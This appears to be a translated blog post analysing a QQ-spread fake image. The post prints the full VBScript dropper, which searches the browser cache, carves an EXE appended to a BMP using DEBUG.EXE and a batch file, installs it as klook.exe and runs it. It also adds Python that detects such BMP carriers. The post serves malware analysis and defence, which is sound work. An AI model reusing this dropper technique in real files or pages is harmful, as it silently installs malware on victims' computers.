One day a QQ contact messaged me saying he was looking at a picture, and stressed that it had no virus. I meant to select the link and download it with 网络快车 (FlashGet) to look at it, but I accidentally clicked straight into it. The firewall popped up asking whether to let mshta.exe access the network. I knew I had been infected, so I blocked it outright, then downloaded that "jpg" with 网络快车 to take a look. It turned out to be HTML + JavaScript, and I found the following suspicious content:
<img src="/images/girl.jpg" width="600" height="800">
This displays the JPG so the viewer thinks it is just a picture of a girl.
<IMG SRC=klook.bmp width=0 height=0>
<object data="klook.ASP" width=0 height=0>
klook.bmp and klook.ASP are guaranteed to be up to something.
So I downloaded klook.bmp and looked: it really is a BMP, but the image is nothing but a jumble of colored blocks. Opening it in UltraEdit, the file header is indeed BMP, yet inside I found the strings "MZ" and "PE"! Then it clicked: he had pasted an EXE file right after the BMP file header!
Then I downloaded klook.asp; its contents are as follows:
<title>-</title>
<SCRIPT LANGUAGE="VBScript">
Option Explicit
Dim FSO,WSH,CACHE,str,sucess
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache")
sucess=0
SearchBMPFile fso.GetFolder(CACHE),"klook[1].bmp"
if sucess=0 then SearchBMPFile fso.GetFolder(CACHE),"klook[2].bmp"
Function SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys
str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname
if FSO.FileExists(str) then
tmp=fso.GetSpecialFolder(2) & "\"
winsys=fso.GetSpecialFolder(1) & "\"
set File=FSO.GetFile(str)
File.Copy(tmp & "tmp.dat")
On Error Resume Next
File.Delete
if FSO.FileExists(str) then exit function
set Lt=FSO.CreateTextFile(tmp & "tmp.in")
Lt.WriteLine("rbx")
Lt.WriteLine("0")
Lt.WriteLine("rcx")
Lt.WriteLine("2200")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
set Lt=FSO.CreateTextFile(tmp & "tmp.bat")
Lt.WriteLine("%40echo off")
Lt.WriteLine(chr(100) & "ebug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out")
Lt.WriteLine("copy " & tmp & "tmp.dat " & winsys & "klook.exe>" & tmp & "tmp.out")
Lt.WriteLine("del " & tmp & "tmp.dat >" & tmp & "tmp.out")
Lt.WriteLine("del " & tmp & "tmp.in >" & tmp & "tmp.out")
Lt.WriteLine(winsys & "klook.exe")
Lt.WriteLine("del %0")
Lt.Close
sucess=1
WSH.Run tmp & "tmp.bat",false,6
On Error Resume Next
end if
If Folder.SubFolders.Count <> 0 Then
For Each SubFolder In Folder.SubFolders
SearchBMPFile SubFolder,fname
Next
End If
End Function
window.close
</script>
<SCRIPT language=JavaScript>
parent.moveTo(0,0);
parent.resizeTo(0,0);
</SCRIPT>
Roughly, it works like this:
First it creates a Scripting.FileSystemObject and a WScript.Shell object, reads the location of IE's temporary files, then searches for the downloaded klook.bmp, and finally extracts the EXE appended to klook.bmp and runs it.
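As an added example (not part of the original post or the dropper itself), the Python below shows how a defender can check a BMP for exactly the layout described here: a DOS/PE image sitting right after the 54-byte BMP headers. It also translates the DEBUG.EXE commands in the dropper's tmp.in (`rbx 0`, `rcx 2200`, `w136`) into a file offset and length, assuming the documented DEBUG behaviour that a file is loaded at CS:0100 and `w` writes BX:CX bytes from the given address. The two sample BMPs are constructed inline; the "carrier" one carries only a fake MZ/PE stub, not a real executable.

```python
import struct

BMP_FILE_HEADER_LEN = 14                                  # BITMAPFILEHEADER
BMP_INFO_HEADER_LEN = 40                                  # BITMAPINFOHEADER
HEADERS_LEN = BMP_FILE_HEADER_LEN + BMP_INFO_HEADER_LEN   # 0x36 = 54 bytes


def debug_write_range(rbx_hex, rcx_hex, w_addr_hex):
    """Translate the dropper's DEBUG commands into (file_offset, byte_count).
    'rbx'/'rcx' set BX:CX = number of bytes to write; 'w<addr>' writes from
    that address. DEBUG loads the file at CS:0100 (assumption: stock DEBUG),
    so load address 0x136 is file offset 0x36, i.e. right after the headers."""
    length = (int(rbx_hex, 16) << 16) | int(rcx_hex, 16)
    file_offset = int(w_addr_hex, 16) - 0x100
    return file_offset, length


def parse_bmp_header(data):
    """Return the declared file size and pixel-data offset, or None if not a BMP."""
    if len(data) < HEADERS_LEN or data[:2] != b"BM":
        return None
    bf_size, _, _, bf_off_bits = struct.unpack_from("<IHHI", data, 2)
    return {"declared_size": bf_size, "pixel_offset": bf_off_bits}


def find_pe_in_bmp(data):
    """Scan for an 'MZ' header after the BMP headers whose e_lfanew points at a
    'PE\\0\\0' signature. Returns a findings dict for the first hit, else None."""
    hdr = parse_bmp_header(data)
    if hdr is None:
        return None
    pos = data.find(b"MZ", HEADERS_LEN)
    while pos != -1:
        if pos + 0x40 <= len(data):                       # full DOS header present?
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            pe_pos = pos + e_lfanew
            if pe_pos + 4 <= len(data) and data[pe_pos:pe_pos + 4] == b"PE\0\0":
                return {
                    "mz_offset": pos,
                    "pe_offset": pe_pos,
                    "right_after_headers": pos == HEADERS_LEN,
                    "inside_pixel_data": pos >= hdr["pixel_offset"],
                    "declared_size": hdr["declared_size"],
                    "actual_size": len(data),
                }
        pos = data.find(b"MZ", pos + 1)
    return None


def build_sample_bmp(embed_pe):
    """Constructed 8x8 24-bit BMP. With embed_pe=True a fake DOS/PE stub is
    placed where the pixel rows begin, so a viewer renders it as colored
    garbage, matching the layout described in the post."""
    width, height = 8, 8
    row_bytes = ((width * 3 + 3) // 4) * 4                # 24, 4-byte aligned
    pixel_len = row_bytes * height                        # 192
    if embed_pe:
        dos = bytearray(b"MZ" + b"\0" * 62)               # 64-byte DOS header
        struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew -> after DOS header
        stub = bytes(dos) + b"PE\0\0" + b"\0" * 20        # signature plus padding
        pixels = stub + b"\0" * (pixel_len - len(stub))
    else:
        pixels = bytes([0x10, 0x80, 0xF0]) * (width * height)
    total = HEADERS_LEN + pixel_len
    file_hdr = b"BM" + struct.pack("<IHHI", total, 0, 0, HEADERS_LEN)
    info_hdr = struct.pack("<IiiHHIIiiII", BMP_INFO_HEADER_LEN, width, height,
                           1, 24, 0, pixel_len, 2835, 2835, 0, 0)
    return file_hdr + info_hdr + pixels


if __name__ == "__main__":
    off, n = debug_write_range("0", "2200", "136")
    print(f"DEBUG writes {n:#x} bytes starting at file offset {off:#x}")
    for label, sample in (("clean", build_sample_bmp(False)),
                          ("carrier", build_sample_bmp(True))):
        print(label, find_pe_in_bmp(sample))
```

The offset translation shows why the dropper's `w136` matters: 0x136 minus DEBUG's 0x100 load address is 0x36, the end of the two standard BMP headers, so the dropper is carving out whatever follows them. A real scanner would also want to flag a BMP whose declared bfSize differs from its actual size, which the findings dict exposes.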
Next time I'll carve out that EXE and disassemble it.